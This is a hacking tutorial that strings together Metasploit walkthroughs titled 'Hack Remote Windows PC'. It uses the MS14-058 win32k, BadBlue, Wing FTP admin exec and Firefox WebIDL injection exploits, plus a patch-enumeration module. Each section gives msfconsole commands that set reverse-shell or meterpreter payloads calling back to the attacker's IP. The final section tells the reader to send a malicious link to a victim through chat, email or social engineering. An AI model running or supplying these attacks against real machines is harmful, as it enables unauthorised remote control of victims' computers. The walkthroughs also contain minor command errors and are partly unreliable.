Hack Remote Windows PC using Windows Track Popup Menu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSend MessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms14_058_track_popup_menu

msf exploit (ms14_058_track_popup_menu)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms14_058_track_popup_menu)>set lhost 192.168.0.111 (IP of Local Host)

msf exploit (ms14_058_track_popup_menu)>set session 1 (IP of Local Host)

msf exploit (ms14_058_track_popup_menu)>exploit

Hack Remote Windows PC using BadBlue Exploit

BadBlue is software which can use for photos, videos, music, and business files with friends and colleagues instantly.

First scan badblue service the victim pc using nmap –sV 192.168.1.2

Open Kali terminal type msfconsole

Now type use exploit/windows/http/badblue_passthru

msf exploit (badblue_passthru)>set rhost 192.168.1.2 (Victim IP)

msf exploit (badblue_passthru)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (badblue_passthru)>exploit  

How to Gather Applied Patches in Remote Windows PC

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/gather/enum_patches

msf exploit (enum_patches)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_patches)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (enum_patches)>set session 1

msf exploit (enum_patches)>exploit

Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets

Wing FTP 4.3.8

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/wing_ftp_admin_exec

msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

msf exploit (wing_ftp_admin_exec)>set username rajchandel

msf exploit (wing_ftp_admin_exec)>set password --------

msf exploit (wing_ftp_admin_exec)>exploit  

Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs

Exploit Targets

Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_webidl_injection

msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

msf exploit (firefox_webidl_injection)>set uripath /

msf exploit (firefox_webidl_injection)>exploit

Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“